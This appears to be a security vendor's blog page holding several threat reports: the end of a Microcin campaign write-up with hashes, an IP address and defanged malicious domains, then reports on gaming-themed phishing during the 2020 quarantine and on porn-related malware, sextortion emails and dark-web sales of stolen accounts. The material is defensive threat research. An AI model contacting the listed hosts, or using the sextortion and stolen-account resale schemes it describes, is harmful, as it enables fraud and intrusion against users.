This time the Microcin campaign has made an interesting step forward, not in terms of a fancy initial infection vector, but as programmers. The API-like network module is much easier to support and update. This improvement is not only about anti-detection or anti-analysis; it’s about software architecture and a step towards a normal non-monolithic framework implementation.

IoC

Downloader
ef9c82c481203ada31867c43825baff4
1169abdf350b138f8243498db8d3451e
c7e11bec874a088a088b677aaa1175a1

Network module
f464b275ba90b3ba9d0a20b8e27879f5
9320180ef6ee8fa718e1ede01f348689
06fd6b47b1413e37b0c0baf55f885525
625a052ddc80efaab99efef70ba8c84f

Domains and IPs
95.179.136.10
apps.uzdarakchi[.]com
forum.uzdarakchi[.]com
forum.mediaok[.]info
owa.obokay[.]com

2020. június 17.

Do cybercriminals play cyber games during quarantine?

Thanks to the coronavirus pandemic, the role of the Internet in our lives has undergone changes, including irreversible ones. Some of these changes are definitely for the better, some are not very good, but almost all of them in some way affect digital security issues.

We decided to take a closer look at the changes around us through the prism of information security, starting with the video game industry.

Key findings:

  • The daily number of blocked attempts to visit malicious gaming-related websites, or browse to such sites from gaming-related websites (or forums), increased by 54% in Aprilcompared to January of this year. In May, we saw a downward trend in this indicator: -18% compared to April.
  • The number of blocked attempts to visit phishing sites that exploit online gaming topics has increased. In particular, the number of notifications from fake Steam gaming platform sites increased by 40% from February to April.
  • Attackers use Minecraft, Counter-Strike: Global Offensive and The Witcher 3: Wild Hunt most often.
  • The users most targeted by such attacks are from Vietnam (7.9%), Algeria (6.6%), Korea (6.2%), Hungary (6.2%) and Romania (6%)
I play until the boss sees

Figures from various sources show that the pandemic has led to a sharp increase in player activity. In March, according to gamesindustry.biz, sales of games, both computer and console, increased significantly.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Growth in game sales in the week of March 16-22. Source: gamesindustry.biz (download)

In April, the number of downloads, as well as the number of simultaneous online players, of Steam reached record levels. The Steam user activity graph (both in-game and just installing the client) (Steam Database) shows the peak of activity on April 4. After that, activity started to reduce, but only slowly. Moreover, the activity graphs of the players are noticeably different from the usual ones – periods of inactivity are less pronounced than in ordinary pre-quarantine days, and the peaks last longer.

The number of Steam users per day. Source: steamdb.info

All these stats are totally understandable. First, people have more free time for games. Statistics collected by Nielsen Games as part of their regular survey of gamers confirms this thesis:

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

The increase in the amount of time spent playing video games by players in different countries. Source: Hollywood Reporter (download)

Second, apparently not all people who wanted to spend time playing video games had a computer at home that would let them do it. That’s what you can figure out checking out the hardware statistics displayed on the Steam site.

If you look closely at the graphics containing information on the video cards used by Steam users, you can see a clear change in graphics cards, which were completely flat before, occurring in March 2020. Until now, the proportions of Nvidia, Intel and AMD video cards have remained at the same level relative to each other. Since the beginning of quarantine, the share of Intel and AMD video cards has grown quite noticeably. This growth was within 2%, which might seem insignificant, until you remember that there are more than 20 million Steam users. That is, the additional number of devices with Intel and AMD graphics cards amounted to hundreds of thousands of computers. Given the specifics of video cards from different manufacturers, we can safely assume that these hundreds of thousands of devices are office laptops that arrived at home during quarantine and that people installed Steam while the boss wasn’t able to see it anyway.

Source: steampowered.com

This is also confirmed by the sudden  in the graphs showing the ratio of Intel and AMD processors (Intel also grew from the beginning of quarantine); and the processors used by players in terms of the number of cores (atypical growth in this proportion was shown by 4-core and 2-core processors) :

Source: steampowered.com

Let’s play with the bad guys?

The increase in the number of players and the time they spend in games, of course, did not go unnoticed by cybercriminals. Gamers have long been the target of attacks by bad guys, who are mainly interested in logins and passwords for game accounts. Now, with the connection of work computers to home networks, and, conversely, with the entry of home devices into work networks that are often poorly prepared for this, attacks on players are becoming not only a way to get to an individual user’s wallet, but also a way to access the corporate infrastructure.

In the first five months of 2020, the number of vulnerabilities discovered on Steam has already exceeded the number of vulnerabilities discovered in any of the previous years. This fact, among other things, indicates a growing interest in finding such vulnerabilities.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Source: cve.mitre.org (download)

We shouldn’t forget also that at the end of April 2020, Valve confirmed the leak of the source code of the popular network games CS: GO and Team Fortress 2. Attackers are most probably already trying to parse their code in search of vulnerabilities that can be used for their own purposes. It is important to understand that these are not offline games, but online games that need a constant connection to game servers and frequent updates. This makes their users even more vulnerable, because their devices are obviously always online, and players are always ready to install an “update” so as not to lose the ability to play.

But even without technically complex attacks using zero-day vulnerabilities, attackers have a large field for their activities. Realizing that the gaming industry is experiencing an unexpected increase in the number of players, they have “increased power” in the field of attacks that exploit the gaming theme in one way or another.

The logical step on the part of the attackers was to increase the number of phishing attacks. This is confirmed by Kaspersky AntiPhishing and the Kaspersky Security Network (KSN). By comparison with February, the number of hits on the thousand most popular phishing sites containing the word “Steam” in the name has significantly increased. Such triggering peaked in April.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

An increase in the number of hits on phishing Steam-related topics relative to February 2020. Source: Kaspersky Security Network (download)

There is a clear increase in the statistics of web antivirus detections of sites with names exploiting the game theme as a whole, for example, containing the names of popular video games and gaming platforms.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

The number of web attacks using game subjects during the period from January to May 2020. Source: KSN (download)

A wide variety of malicious programs are spread with such malicious links: from password stealing malware to ransomware and miners. As always, they fake free versions, updates or extensions for popular games, as well as cheat programs. A similar picture is observed among malicious files that use game-related names to stay unnoticed.

Local threats that use game-related themes as a cover 

Verdict % of all attacks 1 UDS: DangerousObject.Multi.Generic 8.5% 2 Worm.Win32.Fujack.cw 5.4% 3 PDM: Trojan.Win32.Generic 3.8% 4 HEUR: Trojan.Multi.StartPage. b 3.5% 5 PDM: Trojan.Win32.Bazon.a 3.5% 6 Trojan.WinLNK.Agent.ra 3.4% 7 HEUR: Trojan.Win32.Generic 3.2% 8 Email-Worm.Win32. Brontok.q 3.2% 9 HEUR: Trojan.WinLNK.Agent.gen 2.7% 10 Trojan.WinLNK.Agent.rx 2.3%

The statistics do not take into account the Hacktool category of threats – tools that are usually installed by the users themselves but can be used for malicious purposes. We include remote access clients, traffic analyzers, etc. in this category. This category is of interest here because modern cheat programs often use the same techniques as malware, such as memory injection and exploiting vulnerabilities to bypass protection. If we add this kind of detection to the statistics, it will take first place with a share of 10%.

Judging by the statistics obtained from our web antivirus, the attackers focus the most on Minecraft usage. The Witcher 3: Wild Hunt also hits the TOP 3 of the most exploited games, the popularity of which has grown sharply thanks to the series based on the novels by Andrzej Sapkowski.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

The number of attacks using the theme of an online game, January-May 2020. Source: KSN (download)

 Following the dynamics of the responses to the links containing the names of the games, we came to the conclusion that from April to early May, the attackers conducted a campaign in which they used several games at once. In particular, Overwatch and Players Unknown Battlegrounds came into the view of our radar. If you look closely at the graph, you can see many parallel peaks. Before and after the indicated period, this trend does not persist.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Web attacks using the themes of Overwatch and PUBG, January-May 2020. Source: KSN (download)

Users in Vietnam are most susceptible to attacks using game-related topics: almost 8% of all web antivirus detections in this country occurred on sites whose names used the theme of games.

TOP 20 countries by the proportion of blocked attempts to enter malicious sites using the theme of online games, January-May 2020. Source: KSN

Country Percentage of attacked users Vietnam 7.90% Algeria 6.67% South Korea 6.23% Hungary 6.20% Romania 5.98% Poland 5.96% Egypt 5.20% Portugal 4.84% Malaysia 4.75% Greece 4.56% Philippines 4.51% Uzbekistan 4.48% Tunisia 4.41% Morocco 4.06% Iraq 3.82% Brazil 3.61% Italy 3.59% Indonesia 3.54% Myanmar 3.52% France 3.52%

Following Vietnam, the TOP 5 countries for this parameter include Algeria, Korea, Hungary and Romania. In general, the TOP 20 includes many countries in North Africa, Asia and Europe, especially Southern and Eastern Europe.

Conclusion

Tens of millions of people who find themselves isolated at home (combined with plenty of free time) have given a serious boost to the gaming industry. Of course, the attackers could not help but take advantage of this situation and we have seen an impressive increase in attempts to switch to phishing sites that exploit gaming topics.

However, we should keep in mind that this was facilitated not only by the efforts of attackers, but also by the careless actions of the users themselves, who fell for fake emails apparently sent on behalf of game services, or who were looking for hacked versions of some popular games and cheat programs for others.

Unfortunately, in most cases, cybercriminals do not need technologically sophisticated schemes to carry out successful attacks. It is enough to use relevant topics, one of which in the spring of 2020 was video games.

2020. június 15.

Explicit content and cyberthreats: 2019 report

‘Stay at home’ is the new motto for 2020 and it has entailed many changes to our daily lives, most importantly, in terms of our digital content consumption. With users opting to entertain themselves online, malicious activity has grown. Over the past two years we have reviewed how adult content has been used to spread malware and abuse users’ privacy. This is a trend that’s unlikely to go away, especially under current circumstances. While many pornography platforms are enjoying an influx of new users and providing legitimate and safe services, the security risks remain, if not increase.

One of the key concerns that arises when it comes to adult content is the risk to privacy. Every passing year shows privacy is becoming an ever scarcer resource, with mobile devices becoming a popular new infection point. With data leaks happening more frequently than ever, abuse of privacy and its value has yet again become a popular topic of discussion, and a point of concern for many users who may have previously overlooked the issue altogether. The new reality shows this threat is real and quite tangible. Agreeing to a social contract that entails giving up your data in exchange for services, is now widely accepted in our society. It is, however, a completely different story if the data you had no intention of sharing ends up in the open. A situation like that can have devastating consequences and even put lives at risk. Our sexual preferences and sex life most probably top the list of things that we as a society still prefer to keep private, with 28% of users believing porn-related searches must be kept private. However, cybercriminals seem to think otherwise.

Recent news about data leaks relating to pornography confirm the trend. The OnlyFans leak of adult content created by sex workers, which is not only a source of income for them but also information that they did not choose to share publicly, is just one notable incident. This and other examples demonstrate how leaks lead to personal lives being violated, why it is harmful and may even be dangerous. The leak of over 1.195 million users’ personal information from a hentai pornography site is yet another example of how data not meant to be in any way exposed publicly was abused, putting numerous users at risk. Such incidents are happening more and more frequently, and the fault of the organizations that handle such data cannot be overlooked – too often user data is unsecured and unencrypted, despite being a tempting target for cybercriminals looking to make money.

But, of course, there’s more to it than that. To understand which threats await viewers of adult content we conducted the following research.

Methodology and key findings

To understand the risks that may be associated with pornographic content online, we researched several types of threats. We evaluated mobile and PC-focused malware disguised as adult content to see what kind of files users might be downloading and thus putting themselves at risks. We tested whether and to what extent violent content and adult dating apps are used by cybercriminals as a disguise for malware distribution. We examined the privacy aspect of adult content consumption and dangers associated with privacy breaches – from malware hunting for credentials to pornographic websites, to what kind of sex-related content gets leaked into the dark web. We also analyzed phishing and spam linked to porn and sex dating to see what kind of content users should be wary of. Using Kaspersky Security Network – the infrastructure dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world – we measured the number and type of threats users have encountered in recent years.

Additionally, we dived into underground online markets and learnt what kind of sex-related personal data is for sale and what kind of scams are discussed among the cybercriminal fraternity.

As a result, we discovered the following:

  • Mobile porn-related threats are growing, while PC-focused malware and potentially unwanted applications are becoming less appealing to cybercriminals. The number of mobile users attacked more than doubled from 19,699 in 2018 to 42,973 in 2019. By contrast, there was a drop in PC-based threats from
  • Cybercriminals strive for more flexibility when it comes to choosing the kind of malware to distribute – almost two out of every five users attacked by porn-related PC threats have been hit by Trojan-Downloaders (39.6%) that enable other types of malware to be installed later.
  • The number of users attacked by malware hunting for credentials to access pornography websites has dropped, while the number of the malware attacks continues to grow, increasing by 37% from 2018 to 2019 and reaching a total of 1,169,153 in 2019. This demonstrates the persistence of botnets in attacking the same users – a radically different picture to 2018.
  • Privacy becomes an even bigger concern for users when it comes to adult content. Things like leaked personal images and stolen premium subscriptions for pornography sites remain in high demand, with the theme of sex continuing to be used by cybercriminals as an easy way to make money.
PC threats

Malware is spread through the web – disguised as software updates or files, it is distributed across numerous websites all over the digital space. The distribution system is vital for malware. In the past, ‘black SEO‘ – a technique that enabled malicious sites to appear higher up in search results – was the most prevalent, but now that search engines have taken effective steps to hinder it, cybercriminals have turned to other channels.

Malicious software is often distributed via an affiliate network of websites that share pornographic content (we looked into a similar case, though on a less carnal theme, in one of our recent reports on Shlayer Trojan). Moreover, these websites can be created by cybercriminals using template pornographic websites – such services are freely available and their main aim is to create a source of income for the owners from advertising. With control of the content on a website where sextortion malware is distributed, cybercriminals can narrow down the victims to their target audience.

Legitimate websites can also be a source of threats, often unknowingly, with malicious links placed in the comments sections or through the use of malvertising. While the most popular online porn websites are well protected and rarely become a source of malware, this is not necessarily the case for many others. All in all, this shows that downloading anything from the web always comes with risks that have to be considered by any user.

Porn tags = malware tags

Pretty much any content that is in demand can be used as bait by cybercriminals, and this is especially true when it comes to online entertainment. Our previous research has shown that the best way to deliver infected files to victims’ devices is to disguise them as something that they are actually looking for. In the case of adult content, using porn tags has proven to be a popular method. ‘Porn tag’ is a term used to categorize the pornographic video genre. Each porn website has a dedicated page with porn tags and the number of videos available with these tags, reflecting the popularity of the content.

Previously, to determine how prevalent threats disguised as pornographic content were, we analyzed the 100 most popular tags. This showed a correlation between the popularity of porn tags and infected files under the guise of adult content – most malware is distributed under the guise of just a few of the most popular tags. This means it’s not necessary to analyze all 100 tags to understand the threat landscape. This year we limited the analysis to the 10 most popular tags – these we ran against our database of threats and Kaspersky telemetry. We selected the most popular tags based on information from the top three most visited porn websites, choosing those with the most videos uploaded.

The comparison between results for 2018 and 2019 showed that the number of users attacked by this threat has decreased, from 135,780 to 106,928, as did the number of attacks – from 148,419 to 108,973. This, however, does not signal that the threat has become less significant. The results showed a wide variety of files infected both by malware and not-a-virus threats – these included RiskTools, Adware and Downloaders. In fact, in 2019, 473 families of malware and not-a-virus threats belonging to 32 varieties were spread, slightly less than 2018 with 527 families and 30 varieties.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Unique files distributed, the number of users affected and the number of detections of malicious files masked as adult content for PCs in 2018 and 2019. Source: Kaspersky Security Network (download)

Looking at the threats that attacked most users, we see a growth in the share of Trojan-Downloaders – a type of malicious software capable of downloading any other software after installation of the Trojan on a device. Two out of every five users (39%) that downloaded malware under the guise of porn-related content were attacked by this threat. Trojan-Downloaders enable attackers to adapt their strategy and target infected users with whichever malware they deem most effective and profitable.

Once launched, the Trojan-Downloader.Win32.Autoit.vzu distracts the user with the desired video while simultaneously trying to covertly download and launch another malicious file on the infected device

Other types of Trojans are also a popular choice for cybercriminals, followed by not-a-virus threats such as Downloaders and Adware. It’s important to note that Trojan-Ransom and Backdoors, relatively dangerous threats, still remain in the top 10. These threats have been decreasing for a while, but we see that they have not been rendered obsolete. In particular, ransomware that spreads via porn-related docs is more likely to be targeted activity focused on users that view illicit content and wouldn’t want anyone to find out about it.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Top 10 classes of threat that went under the guise of porn-related categories by the number of attacked users in 2018 and 2019. Source: Kaspersky Security Network (download)

A closer look at the most popular detection names demonstrates that the difference between the most prevalent threats in 2018 and 2019 is very minor. Downloaders became even more popular due to their aforementioned flexibility, accounting for six of the top 10 detections in 2019. Adware and not-a-virus Downloaders also remained widespread.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Top 10 detection names for threats disguised as porn-related content, by the number of attacked PC users, in 2018 and 2019. Source: Kaspersky Security Network (download)

Credential hunters

In the digital age, virtually anyone is at risk of losing personal information, particularly valuable credentials. In order to automate the gathering of this information, cybercriminals use credential hunters – a type of malware, whose purpose is to steal login information from various websites and services. We track this sort of malware using our botnet-tracking technology, which enables monitoring of active botnets, gathers intelligence and prevents emerging threats.

Once installed on a PC, this malware can monitor web pages that are opened or create fake ones prompting the user to enter their login and password credentials. This technique is most often used for stealing banking details, though porn sites have not been immune to this malicious activity either.

The dynamics of botnet activity in relation to porn content over the past three years shows a curious tendency – it drew more interest from various groups in 2018, but started declining in 2019, even though the overall number of attacks continued to grow. This is reflected both by a significant decline in the number of users affected by botnets that stole porn accounts in 2019, as well as a decrease in the variety of botnets used to hunt for credentials. For instance, in 2017 only three malware families hunted for porn-related accounts; in 2018 the number grew to five families, while in 2019 it dropped to just one named Ramnit. This further confirms that at some point in 2018 more actors engaged in stealing password credentials from porn sites, but for some reason their interest waned in 2019.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

The number of attacked users and detections of attacks by botnets hunting premium porn accounts, 2017-2019. Source: Kaspersky Security Network (download)

The number of sites affected in 2019 remained the same as the previous year – pornhub.com and xvideos.com, both among the top three most visited porn sites according to similarweb.com statistics in 2020, were targeted in 2019. As attacks consolidated into the activity of just one family, the number of users affected also dropped by 65% from 110,000 in 2018 to 38,846 in 2019. Nevertheless, the number of attacks continued to grow, increasing by 37% from 2018 to 2019 and reaching a total of 1,169,153 attacks, showing the persistence of botnets in attacking the same users.

Overall, we can conclude that even though less cybercriminals demonstrated an interest in credential hunting from porn sites, the threat is still real and focused only on the most visited sites, reflecting the cybercriminals’ understanding of potential demand for credentials on the black market.

Mobile threats

To learn more about mobile threats related to illicit content, we checked all files disguised as porn videos or adult-content installation packages for Android in 2018 and 2019. While we still used porn tags as a filtering criterion – as we did for the analysis of PC-based threats – the methodology was slightly different. We ran 200 popular porn tags against our database of threats in order to gain the fullest insight into porn-related mobile threats. The analysis showed results for 105 tags in 2018 and for 99 tags in 2019, demonstrating that not all porn attracts cybercriminals. Even though less tags were used to spread malicious files disguised as porn, in 2019 the number of users attacked by porn-related malware and not-a-virus threats grew two-fold, reaching 42,973 compared to 19,699 users attacked in 2018.

We also separately ran 40 ‘violent’ porn tags against the same database of detections on Android devices. The violent category included a variety of tags associated with sexual violence against another person. The hypothesis was that more unusual porn tags might demonstrate a disproportionally higher level of malicious activity. However, the results showed that these tags are hardly used for spreading malware, with 270 and 133 attacked users in 2018 and 2019 respectively.

Analysis of the types of threats distributed via such porn-related files demonstrated a slight growth in their variety – in 2018 we found 180 malware and not-a-virus threat families belonging to 20 classes of threats, while in 2019 the numbers were 203 and 20 respectively. Adware, software that’s used to show and redirect users to unwanted advertising pages, remained in first place in terms of variety, with a fifth (19%) of malicious files being AdWare installers. Not-a-virus: RiskTools and Trojans remained among the top three types of threat both in 2018 and 2019, even though their proportions have changed slightly.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Top 10 types of mobile threat that make up the variety of porn-related categories, in 2018 and 2019. Source: Kaspersky Security Network (download)

The proportion of Trojan-Bankers, which hunt for banking cards and other payment credentials, dropped from 7% to 5%. Overall, however, we can see that the types of threat distributed under the guise of adult content has hardly changed in terms of variety.

Looking deeper into the types of threats and how widespread they are, we can see that most users have been targeted by adware detected as AdWare.AndroidOS.Agent.f. This was true for 2018 when 39.23% of attacked users were targeted by this threat, and for 2019 with 35.18% of users attacked by it. Furthermore, six of the top 10 porn-related threats for mobile users were adware in 2018 and seven in 2019. This further confirms that the popularity of adware continues to grow.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Top 10 detection names that represent porn-related categories, by the number of attacked mobile users in 2018 and 2019. Source: Kaspersky Security Network (download)

This type of threat is typically distributed through various affiliate programs whose purpose is to earn money per installation or per download of malicious applications by victims, a method we mentioned in earlier sections.

Overall analysis of the prominence of various types of threats shows that although downloading porn-related content from untrustworthy sources typically leads to infection with adware, more serious threats, including backdoors, spyware and ransomware, can still end up on the devices of unwitting users.

Although adult dating is a topic of interest for cybercriminals (see the Phishing and spam section), creating malicious applications that pretend to be sex dating apps doesn’t appear to be worth the effort. This year we analyzed a variety of threats distributed under the guise of popular sex dating applications. Sex dating apps, unlike regular dating apps, are focused on finding a date for a sexual encounter, meaning such apps have a much clearer targeted audience.

We were interested in seeing whether cybercriminals use popular brand names of sex dating apps in order to distribute malware or not-a-virus threats. The number of attacked users, however, turned out to be miniscule – just 32 over the whole of 2019. This is many times less compared to regular dating apps such as Bumble or Tinder, thus proving that malicious files under the guise of sex dating apps are rarely a source of threat to users. This could be due to the fact that downloading such apps involves greater privacy concerns and is therefore carried out with more attention to the legitimacy of the resource.

Our research found that malicious samples of apps used the names of the following brands: Grindr, Down Dating and Tingle. It’s important to note that the malicious software is no connected in any way to the actual sex dating apps and only uses their brand name to trick users.

Detection name % not-a-virus:UDS:AdWare.AndroidOS.MobiDash.z 55,17% not-a-virus:HEUR:AdWare.AndroidOS.MobiDash.z 51,72% HEUR:Trojan.AndroidOS.Hiddapp.ch 10,34% HEUR:Trojan.AndroidOS.Hiddapp.cg 6,90% not-a-virus:HEUR:AdWare.AndroidOS.Mobidash.aj 6,90%

 Top 5 detection names for mobile threats pretending to be adult dating apps in 2019. Source: Kaspersky Security Network

Phishing and spam

Phishers and spammers are also not averse to using the porn theme. Our content-filtering technologies give us an insight into the kind of porn-related spam and phishing that users are targeted with, as well as enabling us to protect those users.

It’s important to note that the phishing versions of websites are not connected to the original platforms in any way. Cybercriminals copy the websites, often replicating them down to the smallest detail, making it hard for an unwitting user to tell a phishing page from an original. To make the websites appear as trustworthy as possible, fraudsters usually opt to copy the most popular platforms that are widely recognized by users, such as Pornhub.com, XNXX.com and several others. Such phishing websites are generally blocked by search engines and are therefore usually reached via phishing or spam emails, malware or malicious frames redirecting users to compromised websites or malvertising.

The most common goal of these phishing pages is to gather the personal information of users – their credentials and contact details, which can later be sold or used for malicious purposes. Certain websites employ social media authorization for access to the website – this is done to confirm that a user is over 18. Cybercriminals replicate these authorization pages, so they can get their hands on users’ social media credentials when then log in.

This phishing page replicates the authorization page to Pornhub through a popular social network. Once a user logs in, their social media credentials are stolen by the fraudsters

Pornographic phishing pages are also used to spread malware – once a user starts playing a video, they receive a notification that a video player update is required. The downloaded program, however, is in fact malware.

This phishing copy of the popular XNXX.com site mimics the legitimate website’s homepage and is practically impossible to differentiate from the original

Other phishing schemes target e-wallets and credit card credentials. In such cases the victim is lured to pornographic websites to watch a video that is only accessible if the user registers and provides their payment details.

Spam scam

For a few years we didn’t see much activity in terms of pornographic or sex-related content in spam, but then in 2019 the situation changed. Spam emails usually don’t focus on promoting pornographic content as such, but they are used to lure users to phishing sites using social engineering techniques, extort money or simply to advertise sites with explicit content.

The most common type of spam is that focusing on sex dating. Users receive emails allegedly from lonely ladies who invite them to chat on a website. The user is then directed to a new sex dating website with bots pretending to be attractive women, who then coax money from the victims for various content, such as erotic photos or premium access to the website. Cybercriminals also ask users to share their credit card data in order to ‘confirm their age’. Needless to say, this credit card data will later be used or resold on black market forums.

Emails dedicated to sex dating can either look like advertising or messages sent directly from women

This sex dating app interface shows various dialogues from bots pretending to be attractive women

Users are asked to share their credit card details that will be used to activate an allegedly free membership on the site

We have also seen the spread of spam promoting web porn games, with samples of emails advertising platforms where users can play 18+ games, such as 3D porn arcades, and watch explicit content that actually does lead to genuine websites. The main purpose of these spam emails is to advertise the availability of such content.

The email above advertises a website hosting 3D porn games

One of the darkest and possibly most harmful types of sex-related spam is blackmail or ‘sextortion scams’, which have been used by cybercriminals for over three years. We saw the rise of such emails in 2018 with the email content becoming more and more sophisticated. The trend continued in 2019, with new variations of the scams popping up across the web.

The scheme usually works as follows: users receive emails from scammers that claim to have hacked their computers and recorded them watching porn. The emails claim that the threat actor has contact information for friends and family as well as the social media credentials of the users that the actor will use to spread a video of the victim recorded via webcam. The cybercriminal also lists the technologies he allegedly used to gather information about the user to make the email sound more convincing.

In order to lend further legitimacy, the extortionist will claim to have personal information about the user, for instance, their password. The scammer may even cite a password that is allegedly used by the victim. For this purpose, cybercriminals often make use of databases purchased on the dark web. Because users often have the same passwords for different websites, it can be easy to convince victims that their devices have been compromised, even if the password doesn’t match a specific account. Having scared the victim into believing their reputation could be ruined, the scammers demand payment in bitcoin and even provide basic instructions on how to transfer the money.

This sextortion email demonstrates how cybercriminals try to convince a victim that they have been hacked

Last year the industry also saw variations of these scams: emails were distributed in a different language and the bitcoin number was split in two, so that detection systems wouldn’t identify it as spam. Another social engineering trick – convincing the victim that the girlfriend of one of his friends was compromised and blackmailed, but refused to pay – prompts the user out of sheer curiosity to click on malicious attachments in the emails that then download malware. This shows that the cybercriminals continue to adapt their schemes, taking into account developments in security measures and user behavior.

The dark web and beyond – a peek into the market behind the curtain

The dark web is the go-to place when it comes to understanding how the cybercriminal market operates. Various forums are used for the sale of malware, personal data, and the exchange of knowledge, often, quite practical. They also reflect the market value of stolen personal data. The sale of data is like any other business and the way it is organized resembles regular marketplaces, with guarantees from the sellers, a variety of choice and competitive pricing.

An example of a post made in 2019 on a forum offering stolen accounts for a very low price and providing pricing recommendations for resale

Premium adult website accounts, which we addressed in the Credential hunters section of this report, end up on dark web marketplaces where they are sold both in bulk and individually at low prices – starting from as little as US$0.50 per account. The accounts are usually resold at surface web platforms for up to US$5-10, with sellers even recommending prices for the resale of individual accounts. Furthermore, the buyers of stolen accounts often get a lifetime guarantee that the accounts will continue to work and remain accessible, with an option to replace those that become unavailable. The examples below demonstrate how widespread this practice is – on one forum alone we saw 210 offers of stolen accounts.

An example of an illegal forum that contains 210 offers of porn-related accounts for sale

Stolen accounts, somewhat ironically, are often purchased by individuals who care about their privacy and don’t want their personal information such as credit card data or email addresses revealed. Buyers often pay with cryptocurrency, thus remaining completely anonymous.

An example of an advertisement selling stolen Pornhub premium accounts on a regular forum for a low price. Buyers are offered discounts for buying in bulk

Premium porn site accounts are not the only adult content sold on the dark web and illegal forums on the surface web. A glimpse into the dark web market showed the twists and turns a data leak can take when the exposed content is sensitive. In the past year we have seen numerous cases of private adult content sites leaking content created by webcam models, along with their personal details, devastating the victims. But the creators of adult content are not the only ones at risk. While celebrities are the intended targets of such leaks, regular users may also see their private images end up on the web.

While databases of nude images are often available for free (with a donation-based support system for the publisher), some adult image content, including leaked personal images, is sold, albeit quite cheap – for as little as US$2.00 for a collection. This is the price tag cybercriminals put on the private lives of thousands of individuals, underlining a disturbing tendency that places little value on users’ personal data.

This screenshot showcases collections of nude images, both leaked and collected, sold for as low as US$2.00 per collection

This website offers to download sex tapes and nude content of various celebrities for free

Another disturbing trend that we have seen on the dark market is the extension of malware-as-a-service concept, with ready-to-use packages of content and instructions created for fraud. While in the past hackers may have exchanged information on how to trick users or skim cards, now some offer their expertise in other fields, including money extortion from victims interested in sex or simply human attention, albeit intimate.

For instance, in the example below a user offers a full sextortion package with instructions for new users. The package has been created for fooling users into believing they are talking to a real girl and as a result extorting money from them. It not only includes images and videos of a supposed model, which certainly lends more credibility to the trick, it also contains instructions on how to use it to make money – according to the ad, suitable “both for experienced and beginner user”. As a bonus the seller offers access to various porn accounts and certain gifts, and on top of that, shares information about fraud tutorials that the seller has created.

An example of an extortion package sold on the dark market

The seller goes as far as describing the value of his package and providing tutorials on how to use his product

